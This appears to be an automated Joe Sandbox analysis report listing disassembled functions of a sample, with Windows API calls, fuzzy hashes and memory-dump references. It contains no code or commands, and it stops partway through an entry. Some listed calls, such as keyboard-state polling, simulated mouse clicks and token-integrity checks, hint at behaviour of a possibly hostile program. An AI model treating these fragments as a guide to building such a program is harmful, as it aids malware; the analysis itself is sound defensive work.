Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e3b696bd94d6b7685691e741cb0fecd169ae44b1c5b4d9a9ccb99f3f52486e8
Instruction ID: cf479cb697d67614bde92f932bf0d5128683bcb31499731d8e80580a54848e67
Opcode Fuzzy Hash: 3e3b696bd94d6b7685691e741cb0fecd169ae44b1c5b4d9a9ccb99f3f52486e8
Instruction Fuzzy Hash: DA41E235901114AFD718DB28CC88FAEBBB8EB89310F148265FD2EA72D2C7709E41DB51

Function 00BF2714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BF2727
ScreenToClient.USER32(00CB77B0,?), ref: 00BF2744
GetAsyncKeyState.USER32(00000001), ref: 00BF2769
GetAsyncKeyState.USER32(00000002), ref: 00BF2777

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: abc12629f9355ed974bbdace8b8f7f40c485be35f373c938792df43a4a835d9f
Instruction ID: 2a5add4d81c21a07bbd24bd687a00aafbd8a1b46a772ecbfcb31161fa22de96d
Opcode Fuzzy Hash: abc12629f9355ed974bbdace8b8f7f40c485be35f373c938792df43a4a835d9f
Instruction Fuzzy Hash: 43416D75504119FBDF199F69C884AFDBBB4FB05364F20835AF928A32A0C730AD54DB91

Function 00C495D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C495E8
PostMessageW.USER32(?,00000201,00000001), ref: 00C49692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C4969A
PostMessageW.USER32(?,00000202,00000000), ref: 00C496A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C496B0

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 724d435cc382c4ea1980803bd887cd1ad175715ab9e2b40517ae5d171c0e64ce
Instruction ID: fd59f1b31577665e66edfbcf0afd6a46f7c0d819999d9c546cd28c44c66f8725
Opcode Fuzzy Hash: 724d435cc382c4ea1980803bd887cd1ad175715ab9e2b40517ae5d171c0e64ce
Instruction Fuzzy Hash: 0331CE71900229EFDB54CF68D94DBDE3BB5FB45325F114219F924AB1D0C3B09A24DB90

Function 00C4BD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C4BD9D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C4BDBA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C4BDF2
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C4BE18
_wcsstr.LIBCMT ref: 00C4BE22

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 8deb1c532df21202cba57858ed36ca640892b2a6cf9204823ef27edd4f4e040f
Instruction ID: 6f715c5120d0ba274b8e621a18cc6472661ffa4f4570f87a9c23d6ff5d7790df
Opcode Fuzzy Hash: 8deb1c532df21202cba57858ed36ca640892b2a6cf9204823ef27edd4f4e040f
Instruction Fuzzy Hash: 84212932604204BBEB255B759C09FBF7BACEF89760F104069FD09CA191EB61DD50A360

Function 00C7B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3

GetWindowLongW.USER32(?,000000F0), ref: 00C7B804
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00C7B829
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C7B841
GetSystemMetrics.USER32(00000004), ref: 00C7B86A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C6155C,00000000), ref: 00C7B888

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: a7dddf14327fbd5bef0984e102f97d0742eaa22f5efcba2a213f2e027228e3b0
Instruction ID: 3c04fef37f9852aa074ef92768b033cb72ef1191ad82c38190f41d2bf4fdbcc9
Opcode Fuzzy Hash: a7dddf14327fbd5bef0984e102f97d0742eaa22f5efcba2a213f2e027228e3b0
Instruction Fuzzy Hash: E9216D71914215AFCB149F798C08B6A7BA8FB45725F208729FD39D76E0E7309D10CB91

Function 00C66138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00C66159
GetForegroundWindow.USER32 ref: 00C66170
GetDC.USER32(00000000), ref: 00C661AC
GetPixel.GDI32(00000000,?,00000003), ref: 00C661B8
ReleaseDC.USER32(00000000,00000003), ref: 00C661F3

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 4ed266f72dd6fe5a2f6fbf48377fbe505c52be8cf5f8089ccfc3525b1fd0915c
Instruction ID: 9296f481da1358bb9ee7309ed9e49b18f3fc3348f14ffa10ffe8985fc8684b04
Opcode Fuzzy Hash: 4ed266f72dd6fe5a2f6fbf48377fbe505c52be8cf5f8089ccfc3525b1fd0915c
Instruction Fuzzy Hash: 5121A475A002049FD714EF65DC84BAEBBF5EF48311F148469F94A97252DB30AC48DB90

Function 00BF16CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BF1729
SelectObject.GDI32(?,00000000), ref: 00BF1738
BeginPath.GDI32(?), ref: 00BF174F
SelectObject.GDI32(?,00000000), ref: 00BF1778

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 9bd04024920ad34c3994d6c4cf0aed2cfdbf4c8d4eb0cd83ca05781566daf85c
Instruction ID: 29c538b25882cb531e5a2421c3fbebcc0e2f920ef16ba593ad20b0345de8938d
Opcode Fuzzy Hash: 9bd04024920ad34c3994d6c4cf0aed2cfdbf4c8d4eb0cd83ca05781566daf85c
Instruction Fuzzy Hash: 2F219070804208EBDB11AF28EC4876D7BE8EB50321F244B55FD19A71E0D7769D99CB94

Function 00C4C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00C4C84C
_memcmp.LIBCMT ref: 00C4C86A
_memcmp.LIBCMT ref: 00C4C87D
_memcmp.LIBCMT ref: 00C4C895
_memcmp.LIBCMT ref: 00C4C8AD

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: b2f3d96e7d8d7471ea1203f00e4c7e8d658818b64ebba9afa62a3b2a5a155b16
Instruction ID: 6aeade3d7b4d8e89aac19364b84c381840b5ad527e85be3473c39d77e59e3c67
Opcode Fuzzy Hash: b2f3d96e7d8d7471ea1203f00e4c7e8d658818b64ebba9afa62a3b2a5a155b16
Instruction Fuzzy Hash: B801F5B2B021053BD210A2119CC2FFB731CFA21798F084135FE1696381F765DF11A2E8

Function 00C5504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C55075
__beginthreadex.LIBCMT ref: 00C55093
MessageBoxW.USER32(?,?,?,?), ref: 00C550A8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C550BE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C550C5

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 2c768fae09278ec0dbd1a8f8a9b9b5746cdb99e0b4651cb6cef5079a6dcef3b6
Instruction ID: 1c9a47f2b65166509fb0d4ec10e34228d9745ea9061cf95b408196ac56d6d878
Opcode Fuzzy Hash: 2c768fae09278ec0dbd1a8f8a9b9b5746cdb99e0b4651cb6cef5079a6dcef3b6
Instruction Fuzzy Hash: D611E57A908619BBC7419BA89C18B9F7BACEB85321F240366FC24D3390D671894887E5

Function 00C48E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C48E3C
GetLastError.KERNEL32(?,00C48900,?,?,?), ref: 00C48E46
GetProcessHeap.KERNEL32(00000008,?,?,00C48900,?,?,?), ref: 00C48E55
HeapAlloc.KERNEL32(00000000,?,00C48900,?,?,?), ref: 00C48E5C
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C48E73

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 90b9bb1898c1d6f7caaeec6376ca47f261acee8ae184179ea92c2dd1bc1a32a3
Instruction ID: 7df61cf2713ad10b59085cabe5224745620a7ab1bf9d9c7b488951122bb67dad
Opcode Fuzzy Hash: 90b9bb1898c1d6f7caaeec6376ca47f261acee8ae184179ea92c2dd1bc1a32a3
Instruction Fuzzy Hash: BD016D75600204BFDB205FA5DC88E6F7BADFF8A765B600529F849C3220DA319D18CB74

Function 00C557FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C5581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C55829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C55831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C5583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C55877

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 8406342ae90f9a22baffd62030d13fcea1637843556215d7df51c8159ef5d5ce
Instruction ID: 03179144227873211867a401c5fb91d6ba1ecbe0dcf81be629b8f787ca33aa84
Opcode Fuzzy Hash: 8406342ae90f9a22baffd62030d13fcea1637843556215d7df51c8159ef5d5ce
Instruction Fuzzy Hash: AD016D35C41A1DDBCF009FE5D85CBEDBBB8FB08712F104156E801B2180CB319598CBA9

Function 00C48CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C48CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C48CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C48CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C48CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C48D14

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 80bcb9247fa1051621beb6aa308055793bea8d1e0f1a9cff4535b1e81edc5b9e
Instruction ID: e4a52c28f567cb47cbd87667c18d351c1d1b971086916c894a8f7be8431263a8
Opcode Fuzzy Hash: 80bcb9247fa1051621beb6aa308055793bea8d1e0f1a9cff4535b1e81edc5b9e
Instruction Fuzzy Hash: DFF08C31201205AFEB500FE49C8CF6F3BACFF4A755F204029F91482190DB609C08DB60

Function 00C48D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C48D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C48D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C48D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C48D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C48D75

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b7995fd774e6c7e52186eedcaddd9f337fcb0a7dfe580d67a4c92ea67b16c34c
Instruction ID: 30819e80f63feface7320fe84cfb69218543ffe6a98e08cdc2290259c13b6edd
Opcode Fuzzy Hash: b7995fd774e6c7e52186eedcaddd9f337fcb0a7dfe580d67a4c92ea67b16c34c
Instruction Fuzzy Hash: E2F0AF31201305AFEB510FA4EC88F6F3BACFF4A755F640119F964C2190DB609E08DB60

Function 00C4CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00C4CD90
GetWindowTextW.USER32(00000000,?,00000100), ref: 00C4CDA7
MessageBeep.USER32(00000000), ref: 00C4CDBF
KillTimer.USER32(?,0000040A), ref: 00C4CDDB
EndDialog.USER32(?,00000001), ref: 00C4CDF5

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 5cb9e9115d9a3532b776652c4814ffad1f6104e887035a3b94f927c25d181a92
Instruction ID: e64081fa35aad76a569ec604c13a82a9640a0b650d3dc5390fef31db616b6fb5
Opcode Fuzzy Hash: 5cb9e9115d9a3532b776652c4814ffad1f6104e887035a3b94f927c25d181a92
Instruction Fuzzy Hash: FA01A970901704ABEB615B60DD8EFAA7B78FF00705F140669F992A10F1DBF0A958CB84

Function 00BF178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00BF179B
StrokeAndFillPath.GDI32(?,?,00C2BBC9,00000000,?), ref: 00BF17B7
SelectObject.GDI32(?,00000000), ref: 00BF17CA
DeleteObject.GDI32 ref: 00BF17DD
StrokePath.GDI32(?), ref: 00BF17F8

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: ed3ac6410db7a97a982b0eaa3337229f4718182bebf6e2858b694aada6275260
Instruction ID: 5c9e2e7b9f17edaab45aed413f38abadc0434176de183c73555c252298ceab29
Opcode Fuzzy Hash: ed3ac6410db7a97a982b0eaa3337229f4718182bebf6e2858b694aada6275260
Instruction Fuzzy Hash: 3FF0E770008608EBDB55AF2AEC4CB6D3FA5EB40326F248754F92E661F0C7368999DF54

Function 00C5C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C5CA75
CoCreateInstance.OLE32(00C83D3C,00000000,00000001,00C83BAC,?), ref: 00C5CA8D

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

CoUninitialize.OLE32 ref: 00C5CCFA

Strings

.lnk, xrefs: 00C5CA09, 00C5CA31, 00C5CA3B

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 25f74886a150a04a06d60826c8f85819f495f8ae2840f81c5a8ac97af7f168e3
Instruction ID: 0f60732f5e2729b4eee40b36aaff6af60ffbcb82ed115a62513979b4ce0e1c90
Opcode Fuzzy Hash: 25f74886a150a04a06d60826c8f85819f495f8ae2840f81c5a8ac97af7f168e3
Instruction Fuzzy Hash: C0A11B71204205AFD300EF64C891EAFB7E8EF94718F04496DF65597292EB70EE49CB92

Function 00BFE3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00C10FE6: std::exception::exception.LIBCMT ref: 00C1101C
Part of subcall function 00C10FE6: __CxxThrowException@8.LIBCMT ref: 00C11031

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Part of subcall function 00C01680: _memmove.LIBCMT ref: 00C016DB

__swprintf.LIBCMT ref: 00BFE598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00BFE431

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: f52b4ef8401687f55a2821d99caa51c726a5189f9241840f16501e1ded3e3ad4
Instruction ID: 6da1eb94520ea28fe1988797cf9f26b1e3caac64004057c2c68fe9d1ac76cff6
Opcode Fuzzy Hash: f52b4ef8401687f55a2821d99caa51c726a5189f9241840f16501e1ded3e3ad4
Instruction Fuzzy Hash: 3F918B715182059FC724EF24C896C7EB7F8EF95700F04095DF9969B2A1EB20EE48DB92

Function 00C1523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00C152CD

Part of subcall function 00C20320: __87except.LIBCMT ref: 00C2035B

Strings

pow, xrefs: 00C152A5, 00C152C2

Memory Dump Source

